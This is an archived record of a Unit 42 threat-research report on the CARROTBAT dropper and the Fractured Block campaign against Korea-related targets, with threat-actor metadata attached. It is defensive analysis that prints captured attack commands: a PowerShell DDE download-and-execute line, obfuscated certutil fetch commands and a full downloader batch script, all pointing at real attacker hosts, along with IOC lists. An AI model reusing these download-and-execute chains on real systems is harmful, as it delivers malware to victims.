{ "id": "44d34ee1-f17c-4fbd-a34e-339406e60ad4", "created_at": "2026-04-06T00:21:07.965214Z", "updated_at": "2026-04-10T03:38:09.783149Z", "deleted_at": null, "sha1_hash": "63f15b7536e3b4631b02bb9807e21f9e22190c9f", "title": "The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4481362, "plain_text": "The Fractured Block Campaign: CARROTBAT Used to Deliver\r\nMalware Targeting Southeast Asia\r\nBy Josh Grunzweig, Kyle Wilhoit\r\nPublished: 2018-11-29 · Archived: 2026-04-05 16:16:08 UTC\r\nUnit 42 has uncovered a campaign leveraging a previously unreported customized dropper that is being used to\r\ndeliver lures primarily pertaining to the South Korea and North Korea region. These lures revolve around a series\r\nof subjects, including various cryptocurrencies, cryptocurrency exchanges, and political events. Based on various\r\ninformation witnessed within this dropper, Unit 42 has dubbed this malware family CARROTBAT.\r\nCARROTBAT was initially discovered in an attack on December 2017. This attack was made against a British\r\ngovernment agency using the SYSCON malware family. SYSCON is a simple remote access Trojan (RAT) that\r\nuses the file transfer protocol (FTP) for network communications. While there is no evidence that this attack\r\nagainst a British government agency made use of the CARROTBAT dropper, we found overlaps within this\r\nattack’s infrastructure that ultimately lead us to CARROTBAT’s initial discovery, as well as other ties between\r\nthese two malware families.\r\nIn total, 29 unique CARROTBAT samples have been identified to date, containing a total of 12 confirmed unique\r\ndecoy documents. These samples began appearing in March of this year, with the majority of activity taking place\r\nwithin the past 3 months. The payloads vary, as earlier instances delivered SYSCON, while newer instances are\r\ndelivering the previously reported OceanSalt malware family. CARROTBAT and their associated payloads\r\nconstitute a campaign that we are dubbing ‘Fractured Block’.\r\nInitial Attack\r\nOn December 13, 2017, a spear phishing email was sent from the email address of yuri.sidorav@yandex[.]ru to a\r\nhigh ranking individual within a British government agency. This email contained the following subject, with an\r\nattached document file of the same name:\r\nUS. would talk with North Korea “without precondition”\r\nWithin this attached Word document, the following text is displayed:\r\nU.S. would talk with North Korea “without precondition”: Tillerson, By Seungmock Oh\r\nThis text references an article that was published on the same day as the attack by NKNews[.]org. The article in\r\nquestion discusses diplomatic ties between the United States and North Korea.\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 1 of 17\n\nFigure 1 Article referenced by decoy document in attack against British government agency\r\nThe attached document leverages a DDE exploit to ultimately execute the following code:\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 2 of 17\n\nc:\\\\windows\\\\system32\\\\cmd.exe \"/k PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -\r\nnoprofile -command (New-Object\r\nSystem.Net.WebClient).DownloadFile('https://881.000webhostapp[.]com/0_31.doc',\r\n'%TEMP%\\\\AAA.exe');Start-Process('%TEMP%\\\\AAA.exe')\r\nPalo Alto Networks first witnessed this DDE exploit technique in May 2017, and attackers continue to leverage it.\r\nThe command run by this particular malware sample attempts to download a remote executable file named\r\n0_31.doc, which in turn is placed within the victim’s %TEMP% directory with the filename of AAA.exe prior to\r\nbeing executed.\r\nThe payload in question belongs to the SYSCON malware family. It communicates with ftp.bytehost31[.]org via\r\nFTP for command and control (C2).\r\nFigure 2 SYSCON network traffic witnessed during execution\r\nPivoting on the domain hosting the SYSCON sample, 881.000webhostapp[.]com, revealed a number of additional\r\nsamples, including a sample of the KONNI malware family, and four 64-bit executable files belonging to the\r\nCARROTBAT malware family. Pivoting further on characteristics belonging to CARROTBAT ultimately led to\r\nthe identification of 29 unique samples in this malware family.\r\nFractured Block Campaign\r\nThe campaign dubbed Fractured Block encompasses all CARROTBAT samples identified to date. CARROTBAT\r\nitself is a dropper that allows an attacker to drop and open an embedded decoy file, followed by the execution of a\r\ncommand that will download and run a payload on the targeted machine. In total, the following 11 decoy\r\ndocument file formats are supported by this malware:\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 3 of 17\n\ndoc\r\n.docx\r\n.eml\r\n.hwp\r\n.jpg\r\n.pdf\r\n.png\r\n.ppt\r\n.pptx\r\n.xls\r\n.xlsx\r\nAfter the embedded decoy document is opened, an obfuscated command such as the following is executed on the\r\nsystem:\r\nC: \u0026\u0026 cd %TEMP% \u0026\u0026 c^e^r^tutil -urlca^che -spl^it -f https://881.000webhostapp[.]com/1.txt \u0026\u0026 ren\r\n1.txt 1.bat \u0026\u0026 1.bat \u0026\u0026 exit\r\nThis command will attempt to download and execute a remote file via the Microsoft Windows built-in certutil\r\nutility. More information on this technique and the CARROTBAT malware family may be found within the\r\nAppendix.\r\nThe 29 unique CARROTBAT malware samples have compile timestamps between March 2018 to September\r\n2018. Of these 29 unique samples, 11 unique decoy documents were leveraged in attacks, as seen in the figure\r\nbelow:\r\nFigure 3 Timeline of decoy documents being dropped by CARROTBAT\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 4 of 17\n\nA majority of the decoy documents targeting victims in Korea had subject matter related to cryptocurrencies. In\r\none unique case, the decoy contains a business card belonging to an individual working at COINVIL, which is an\r\norganization that announced plans to build a cryptocurrency exchange in the Philippines in May 2018.\r\nAdditional lure subjects included timely political events, such as relations between the U.S. and North Korea, as\r\nwell as a trip by U.S. President Donald Trump to a summit in Singapore.\r\nPayloads for the CARROTBAT samples varied. Originally, between the periods of March 2018 to July 2018,\r\nmultiple instances of the SYSCON malware family were observed. These samples communicated with the\r\nfollowing hosts via FTP for C2 communication:\r\nftp.byethost7[.]com\r\nftp.byethost10[.]com\r\nfiles.000webhost[.]com\r\nBeginning in June 2018, we observed the OceanSalt malware family being dropped by CARROTBAT. These\r\nsamples continue to be used at the time of this writing, and were observed communicating with the following host\r\nfor C2 communication:\r\n61.14.210[.]72:7117\r\nInteresting Ties with Other Threat Activity\r\nAs stated earlier within this blog, there is infrastructure overlap between the CARROTBAT and KONNI malware\r\nfamilies. KONNI is a RAT that is believed to have  been in use for over four years, with a wide array of\r\nfunctionalities, often leveraging free web hosting providers like 000webhost for its C2 infrastructure. This\r\nparticular malware family has yet to be attributed to a named group at the time of this writing, however, targeting\r\nhas historically focused on the Southeast Asia region.\r\nAnother relationship we have mentioned repeatedly is the use of the SYSCON malware family. This particular\r\nmalware family was first reported in October 2017 and has been observed delivering decoy documents pertaining\r\nto North Korea. The malware is generally unsophisticated, making use of remote FTP servers for C2\r\ncommunication.\r\nBelow you can see the KONNI usage highlighted in the gold flags and SYSCON highlighted in the purple flags.\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 5 of 17\n\nFigure 4 Maltego diagram correlating malicious activity\r\nFinally, the third overlap is the OceanSalt malware payload. First reported by McAfee in October 2018, reported\r\nvictims include South Korea, the United States, and Canada. Like the samples outlined in the McAfee report, the\r\nOceanSalt samples observed in the Fractured Block Campaign employed the same code similarities as those of\r\nComment Crew (aka APT1), however, we believe that these code similarities are a false flag. The malware used\r\nby Comment Crew has been in circulation for many years, and we do not believe the activity outlined in this blog\r\npost has any overlap with the older Comment Crew activity.\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 6 of 17\n\nFigure 5 Threat activity overlap over time\r\nConclusion\r\nFinding CARROTBAT provided an important lynchpin in identifying Fractured Block Campaign activity. Using\r\nCARROTBAT, we were able to find related OceanSalt, SYSCON and KONNI activity. The various overlaps\r\nencountered are notable, and it is our suspicion that this threat activity may all belong to the same threat actor.\r\nHowever, we do not believe there to be enough evidence at this time to make this claim with complete certainty.\r\nThe CARROTBAT malware family is a somewhat unique dropper and while it supports various types of decoy\r\ndocuments, and employs rudimentary command obfuscation, it should be made clear that it is not sophisticated.\r\nWhile the actors behind Fractured Block remain active,\r\nPalo Alto Networks customers are protected from this threat in the following ways:\r\nAutoFocus customers can track these samples with the FracturedBlock, SYSCON, KONNI, and\r\nCARROTBAT\r\nWildFire detects all files mentioned in this report with malicious verdicts.\r\nTraps blocks all of the files currently associated with the Fractured Block campaign.\r\nA special thanks to Chronicle's VirusTotal team for their assistance researching this threat.\r\nAppendix\r\nCARROTBAT Technical Analysis\r\n For the analysis below, the following sample is used:\r\nMD5 3e4015366126dcdbdcc8b5c508a6d25c\r\nSHA1 f459f9cfbd10b136cafb19cbc233a4c8342ad984\r\nSHA256 aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 7 of 17\n\nFile Type PE32 executable (GUI) Intel 80386, for MS Windows\r\nCompile Timestamp 2018-09-05 00:17:22 UTC\r\nUpon execution, the malware will read the last 8 bytes of itself. These bytes include two DWORDs that contain\r\nboth the length of the embedded decoy document, as well as the type of file it is.\r\nFigure 6 End of CARROTBAT file containing decoy document information\r\nUsing this gathered information, CARROTBAT continues to read the end of itself, minus the previously retrieved\r\n8 bytes. This data contains the entirety of the embedded decoy document and is written to the same directory and\r\nfilename as the original malware sample. However, the file extension is changed based on the previously retrieved\r\nfile type value. The following corresponding values are used by CARROTBAT:\r\nValue Document Extension\r\n0x0 .doc\r\n0x1 .pdf\r\n0x2 .jpg\r\n0x3 .xls\r\n0x4 .xlsx\r\n0x5 .hwp\r\n0x6 .docx\r\n0x7 .png\r\n0x8 .eml\r\n0x9 .ppt\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 8 of 17\n\n0xA .pptx\r\nIn this particular case, the .hwp file extension is used for the decoy document. After the decoy is dropped to disk,\r\nit is opened in a new process. In this instance, the whitepaper for the BKN Bank cryptocurrency exchange is\r\ndisplayed to the victim:\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 9 of 17\n\nFigure 7 HWP decoy document displayed to victim\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 10 of 17\n\nAfter this document is displayed, the malware will continue to execute the following command in a new process:\r\nC: \u0026\u0026 cd %TEMP% \u0026\u0026 c^e^r^tutil -urlca^che -spl^it -f http://s8877.1apps[.]com/vip/1.txt \u0026\u0026 ren 1.txt\r\n1.bat \u0026\u0026 1.bat \u0026\u0026 exit\r\nThis command will download a remote file using the built-in Microsoft Windows certutil command. In this\r\nparticular instance, the following script is retrieved:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n@echo off\r\n:if exist \"%PROGRAMFILES(x86)%\" (GOTO 64BITOS) ELSE (GOTO 32BITOS)\r\n:32BITOS\r\ncertutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup.txt \u003e nul\r\ncertutil -decode -f setup.txt setup.cab \u003e nul\r\ndel /f /q setup.txt \u003e nul\r\nGOTO ISEXIST\r\n:64BITOS\r\n:certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup2.txt \u003e nul\r\n:certutil -d^ecode -f setup2.txt setup.cab \u003e nul\r\n:del /f /q setup2.txt \u003e nul\r\n:GOTO ISEXIST\r\n:ISEXIST\r\nif exist \"setup.cab\" (GOTO EXECUTE) ELSE (GOTO EXIT)\r\n:EXECUTE\r\nver | findstr /i \"10\\.\" \u003e nul\r\nIF %ERRORLEVEL% EQU 0 (GOTO WIN10) ELSE (GOTO OTHEROS)\r\n:WIN10\r\nexpand %TEMP%\\setup.cab -F:* %CD% \u003e nul\r\n:if exist \"%PROGRAMFILES(x86)%\" (rundll32 %TEMP%\\drv.dll EntryPoint) ELSE (rundll32\r\n%TEMP%\\drv.dll EntryPoint)\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 11 of 17\n\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n%TEMP%\\install.bat\r\nGOTO EXIT\r\n:OTHEROS\r\nwusa %TEMP%\\setup.cab /quiet /extract:%TEMP% \u003e nul\r\n%TEMP%\\install.bat\r\nGOTO EXIT\r\n:EXIT\r\ndel /f /q setup.cab \u003e nul\r\ndel /f /q %~dpnx0 \u003e nul\r\nThis script simply checks the operating system of the victim and downloads the respective payload again using the\r\ncertutil executable. In this particular instance, the payload is encoded via base64, which certutil decodes. The\r\npayload in question is a CAB file that is then unpacked. Finally, the malware executes the extracted install.bat\r\nscript before deleting the original files and exiting.\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 12 of 17\n\nFigure 8 CARROTBAT downloading final payload via certutil\r\nThe downloaded CAB file has the following properties:\r\nMD5 a943e196b83c4acd9c5ce13e4c43b4f4\r\nSHA1 e66e416f300c7efb90c383a7630c9cfe901ff9fd\r\nSHA256 cfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d62\r\nFile Type Microsoft Cabinet archive data, 181248 bytes, 3 files\r\nThe following three files and their descriptions are dropped by this CAB file:\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 13 of 17\n\nFilename Purpose\r\nInstall.bat\r\nInstallation batch script responsible for copying the other files to\r\nC:\\Users\\Public\\Downloads and setting the Run registry key to ensure persistence. It will\r\nalso remove any original files before exiting.\r\nDrvUpdate.dll Instance of the OceanSalt malware family.\r\nwinnet.ini Encoded C2 information.\r\nThe C2 information is stored via the external winnet.ini file and is encoded using an incremental XOR key. The\r\nfollowing function written in Python may be used to decode this file:\r\ndef decode(data):\r\nout = \"\"\r\nc = 0\r\nfor d in data:\r\nout += chr(ord(d)^c)\r\nc+=1\r\nreturn out\r\nOnce decoded it is discovered that this instance of OceanSalt attempts to communicate with 61.14.210[.]72 on\r\nport 7117.\r\nCARROTBAT Samples\r\nd34aabf20ccd93df9d43838cea41a7e243009a3ef055966cb9dea75d84b2724d\r\n8b6b4a0e0945c6daf3ebc8870e3bd37e54751f95162232d85dc0a0cc8bead9aa\r\n26fc6fa6acc942d186a31dc62be0de5e07d6201bdff5d7b2f1a7521d1d909847\r\ne218b19252f242a8f10990ddb749f34430d3d7697cbfb6808542f609d2cbf828\r\n824f79a8ee7d8a23a0371fab83de44db6014f4d9bdea90b47620064e232fd3e3\r\n70106ebdbf4411c32596dae3f1ff7bf192b81b0809f8ed1435122bc2a33a2e22\r\n87c50166f2ac41bec7b0f3e3dba20c7264ae83b13e9a6489055912d4201cbdfc\r\nac23017efc19804de64317cbc90efd63e814b5bb168c300cfec4cfdedf376f4f\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 14 of 17\n\nd965627a12063172f12d5375c449c3eef505fde1ce4f5566e27ef2882002b5d0\r\n7d443434c302431734caf1d034c054ad80493c4c703d5aaeafa4a931a496b2ae\r\n1142dcc02b9ef34dca2f28c22613a0489a653eb0aeafe1370ca4c00200d479e0\r\n337b8c2aac80a44f4e7f253a149c65312bc952661169066fe1d4c113348cc27b\r\n92b45e9a3f26b2eef4a86f3dae029f5821cffec78c6c64334055d75dbf2a62ef\r\n42e18ef3aaadac5b40a37ec0b3686c0c2976d65c978a2b685fefe50662876ded\r\nba78f0a6ce53682942e97b5ad7ec76a2383468a8b6cd5771209812b6410f10cb\r\ndca9bd1c2d068fc9c84a754e4dcf703629fbe2aa33a089cb50a7e33e073f5cea\r\n7d8376057a937573c099e3afe2d8e4b8ec8cb17e46583a2cab1a4ac4b8be1c97\r\n3cbccb059225669dcfdc7542ce28666e0b1a227714eaf4b16869808bffe90b96\r\naef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de\r\n2547b958f7725539e9bba2a1852a163100daa1927bb621b2837bb88007857a48\r\n6c591dddd05a2462e252997dc9d1ba09a9d9049df564d00070c7da36e526a66a\r\n22b16fa7af7b51880faceb33dd556242331daf7b7749cabd9d7c9735fb56aa10\r\n3869c738fa80b1e127f97c0afdb6c2e1c15115f183480777977b8422561980dd\r\nba100e7bac8672b9fd73f2d0b7f419378f81ffb56830f6e27079cb4a064ba39a\r\ne527ade24beacb2ef940210ba9acb21073e2b0dadcd92f1b8f6acd72b523c828\r\n9fa69bdc731015aa7bdd86cd311443e6f829fa27a9ba0adcd49fa773fb5e7fa9\r\nffd1e66c2385dae0bb6dda186f004800eb6ceaed132aec2ea42b1ddcf12a5c4e\r\ne3b45b2e5d3e37f8774ae22a21738ae345e44c07ff58f1ab7178a3a43590fddd\r\na0f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaa9c1dc\r\nSYSCON Payload Samples\r\n5a2c53a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8b\r\nfceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f659\r\nfa712f2bebf30592dd9bba4fc3befced4c727b85a036550fc3ac70d1965f8de5\r\nda94a331424bc1074512f12d7d98dc5d8c5028821dfcbe83f67f49743ae70652\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 15 of 17\n\n2efdd25a8a8f21c661aab2d4110cd7f89cf343ec6a8674ff20a37a1750708f27\r\n62886d8b9289bd92c9b899515ff0c12966b96dd3e4b69a00264da50248254bb7\r\nf27d640283372eb805df794ae700c25f789d77165bb98b7174ee03a617a566d4\r\n0bb099849ed7076177aa8678de65393ef0d66e026ad5ab6805c1c47222f26358\r\nf4c00cc0d7872fb756e2dc902f1a22d14885bf283c8e183a81b2927b363f5084\r\ne8381f037a8f70d8fc3ee11a7bec98d6406a289e1372c8ce21cf00e55487dafc\r\n1c8351ff968f16ee904031f6fba8628af5ca0db01b9d775137076ead54155968\r\n2da750b50ac396a41e99752d791d106b686be10c27c6933f0d3afe762d6d0c48\r\n5d1388c23c94489d2a166a429b8802d726298be7eb0c95585f2759cebad040cf\r\n0490e7d24defc2f0a4239e76197f1cba50e7ce4e092080d2f7db13ea0f88120b\r\nOceanSalt Payload Samples\r\n59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005\r\n7cf37067f08b0b8f9c58a35d409fdd6481337bdc2d5f2152f8e8f304f8a472b6\r\nfe8d65287dd40ca0a1fadddc4268268b4a77cdb04a490c1a73aa15b6e4f1dd63\r\na23f95b4a602bdaef1b58e97843e2f38218554eb57397210a1aaa68508843bd0\r\n59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005\r\ncfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d62\r\n7ae933ed7fc664df4865840f39bfeaf9daeb3b88dcd921a90366635d59bc15f2\r\n3663e7b197efe91fb7879a56c29fb8ed196815e0145436ee2fad5825c29de897\r\n59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005\r\n7ae933ed7fc664df4865840f39bfeaf9daeb3b88dcd921a90366635d59bc15f2\r\ncf31dac47680ff1375ddaa3720892ed3a7a70d1872ee46e6366e6f93123f58d2\r\nfe186d04ca6afec2578386b971b5ecb189d8381be055790a9e6f78b3f23c9958\r\nInfrastructure\r\nhttps://881.000webhostapp[.]com/1.txt\r\nhttp://attach10132.1apps[.]com/1.txt\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 16 of 17\n\nhttps://071790.000webhostapp[.]com/1.txt\r\nhttps://vnik.000webhostapp[.]com/1.txt\r\nhttps://7077.000webhostapp[.]com/vic/1.txt\r\nhttp://a7788.1apps[.]com/att/1.txt\r\nhttp://s8877.1apps[.]com/vip/1.txt\r\nhttp://hanbosston.000webhostapp[.]com/1.txt\r\nhttp://bluemountain.1apps[.]com/1.txt\r\nhttps://www.webmail-koryogroup[.]com/keep/1.txt\r\nhttp://filer1.1apps[.]com/1.txt\r\nftp.byethost7[.]com\r\nftp.byethost10[.]com\r\nfiles.000webhost[.]com\r\nwebhost[.]com\r\n61.14.210[.]72:7117\r\nSource: https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southe\r\nast-asia/\r\nhttps://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/\r\nPage 17 of 17\n\n https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/ \nFigure 1 Article referenced by decoy document in attack against British government agency\nThe attached document leverages a DDE exploit to ultimately execute the following code:\n Page 2 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MITRE" ], "references": [ "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/" ], "report_names": [ "unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4", "created_at": "2025-08-07T02:03:25.096857Z", "updated_at": "2026-04-10T02:00:03.659118Z", "deleted_at": null, "main_name": "NICKEL JUNIPER", "aliases": [ "Konni", "OSMIUM ", "Opal Sleet " ], "source_name": "Secureworks:NICKEL JUNIPER", "tools": [ "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "dabb6779-f72e-40ca-90b7-1810ef08654d", "created_at": "2022-10-25T15:50:23.463113Z", "updated_at": "2026-04-10T02:00:05.369301Z", "deleted_at": null, "main_name": "APT1", "aliases": [ "APT1", "Comment Crew", "Comment Group", "Comment Panda" ], "source_name": "MITRE:APT1", "tools": [ "Seasalt", "ipconfig", "Cachedump", "PsExec", "GLOOXMAIL", "Lslsass", "PoisonIvy", "WEBC2", "Mimikatz", "gsecdump", "Pass-The-Hash Toolkit", "Tasklist", "xCmd", "pwdump" ], "source_id": "MITRE", "reports": null }, { "id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb", "created_at": "2023-01-06T13:46:38.228042Z", "updated_at": "2026-04-10T02:00:02.883048Z", "deleted_at": null, "main_name": "APT1", "aliases": [ "PLA Unit 61398", "Comment Crew", "Byzantine Candor", "Comment Group", "GIF89a", "Group 3", "TG-8223", "Brown Fox", "ShadyRAT", "G0006", "COMMENT PANDA" ], "source_name": "MISPGALAXY:APT1", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b43c8747-c898-448a-88a9-76bff88e91b5", "created_at": "2024-02-02T02:00:04.058535Z", "updated_at": "2026-04-10T02:00:03.545252Z", "deleted_at": null, "main_name": "Opal Sleet", "aliases": [ "Konni", "Vedalia", "OSMIUM" ], "source_name": "MISPGALAXY:Opal Sleet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b", "created_at": "2022-10-25T16:07:23.480196Z", "updated_at": "2026-04-10T02:00:04.626125Z", "deleted_at": null, "main_name": "Comment Crew", "aliases": [ "APT 1", "BrownFox", "Byzantine Candor", "Byzantine Hades", "Comment Crew", "Comment Panda", "G0006", "GIF89a", "Group 3", "Operation Oceansalt", "Operation Seasalt", "Operation Siesta", "Shanghai Group", "TG-8223" ], "source_name": "ETDA:Comment Crew", "tools": [ "Auriga", "Cachedump", "Chymine", "CookieBag", "Darkmoon", "GDOCUPLOAD", "GLOOXMAIL", "GREENCAT", "Gen:Trojan.Heur.PT", "GetMail", "Hackfase", "Hacksfase", "Helauto", "Kurton", "LETSGO", "LIGHTBOLT", "LIGHTDART", "LOLBAS", "LOLBins", "LONGRUN", "Living off the Land", "Lslsass", "MAPIget", "ManItsMe", "Mimikatz", "MiniASP", "Oceansalt", "Pass-The-Hash Toolkit", "Poison Ivy", "ProcDump", "Riodrv", "SPIVY", "Seasalt", "ShadyRAT", "StarsyPound", "TROJAN.COOKIES", "TROJAN.FOXY", "TabMsgSQL", "Tarsip", "Trojan.GTALK", "WebC2", "WebC2-AdSpace", "WebC2-Ausov", "WebC2-Bolid", "WebC2-Cson", "WebC2-DIV", "WebC2-GreenCat", "WebC2-Head", "WebC2-Kt3", "WebC2-Qbp", "WebC2-Rave", "WebC2-Table", "WebC2-UGX", "WebC2-Yahoo", "Wordpress Bruteforcer", "bangat", "gsecdump", "pivy", "poisonivy", "pwdump", "zxdosml" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434867, "ts_updated_at": 1775792289, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/63f15b7536e3b4631b02bb9807e21f9e22190c9f.pdf", "text": "https://archive.orkl.eu/63f15b7536e3b4631b02bb9807e21f9e22190c9f.txt", "img": "https://archive.orkl.eu/63f15b7536e3b4631b02bb9807e21f9e22190c9f.jpg" } }